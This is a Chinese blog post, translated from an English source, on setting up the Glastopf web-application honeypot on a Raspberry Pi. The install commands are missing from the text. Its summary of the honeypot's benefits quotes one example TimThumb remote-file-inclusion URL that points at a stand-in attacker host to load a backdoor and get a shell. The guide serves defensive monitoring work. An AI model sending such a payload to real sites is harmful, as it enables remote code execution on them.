最新消息:本站现已开通注册投稿功能,欢迎大家注册及投稿!对于高质原创稿件,会给予一定的奖励!!谢谢!

树莓派蜜罐 Glastopf 的简单部署

WEB安全 Eternal 189浏览 0评论

14725509779288

Glastopf 是一个由 Lukas Rist a.k.a glaslos 领导的 web 应用程序蜜罐项目 Glastopf 项目创建于 2009 年。它是一个由 Python 编写的,用于记录基于 Web 应用程序攻击信息的 Web 服务器。它可以对例如,结构化查询语言注入(SQLI),远程代码执行(RCE),本地文件包含(LFI ),远程文件包含(RFI)等攻击行为进行记录,并且它还会模拟成一个有漏洞的 Web 应用程序,以欺骗攻击者或扫描器,将其作为一个可被用来攻击的 Web 服务器目标 。

以下是这个项目 README 文件中摘取的一些关于 Glastopf 介绍信息,以更我们更好地了解这个 web 应用程序蜜罐:

攻击者常常使用搜索引擎或特定的搜索语法来查找他们的攻击目标。为了吸引他们,Glastopf 故意提供关键字(aka dork),并会从他们的请求中提取关键字,来自动扩展其攻击面。 所以随着时间的推移和越来越多的攻击,蜜罐变得就会越来越有吸引力。

Glastopf 同时支持 hpfeeds 协议,用于记录事件报告。如果你不想开启它,则可以在 glastopf.cfg 配置文件中关闭设置 。

下面让我们一起来创建一个,属于我们的 Glastopf 蜜罐!

准备:

1.树莓派(1个)

2.  Debian wheezy 版镜像

3.至少 4 GB 大小的 Micro SD 卡(1张)

4.正常的网络连接

安装

/etc/apt 目录中找到源列表文件,并将以下内容追加到该源文件:

接着,我们来安装 Glastopf 的依赖包:

配置 PHP Sandbox 。

使用 git 下载 BFR

编译安装完成后,会显示如下信息:

复制或追加 bfr.so 扩展模块文件路径到 php.ini 文件内:

使用 php –version 确认是否成功添加:

从 pip 安装最新稳定版本的 Glastopf:

配置及准备 Glastopf 环境:

停止 apache 服务,以便 Web 应用程序蜜罐可以侦听 80 端口:

现在我们来运行 Glastopf 蜜罐:

当我们成功运行 Glastopf 后,glastopfpi 目录下将会自动生成一个 glastopf.cfg 配置文件。你可以在该配置文件内,更改 Glastopf 的默认侦听端口等配置信息。

日志记录

log 日志文件,可以在 log 目录下找到:

总结:

部署 web 应用程序蜜罐 Glastopf ,可以为我们带来以下好处:

1.可以及时为我们发现一些恶意源,恶意链接或恶意脚本。例如:Timthumb 中的远程代码执行漏洞,可以利用 URL 来远程跨站执行后门脚本程序,从而 getshell 。其链接构造如下:http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.iamahacker.com

2.捕获可能的IRC僵尸网络链接或来源。

3.判断攻击者或扫描程序所使用的攻击类型。

4.实时捕获攻击者在 POST 请求中的 SQL 注入语句。

5.发现未知或新的攻击。

本文由 即刻安全 编译及整理,转载请注明来源!

原文地址:https://n0where.net/raspberry-pi-honeypot/

转载请注明:即刻安全 » 树莓派蜜罐 Glastopf 的简单部署

您必须 登录 才能发表评论!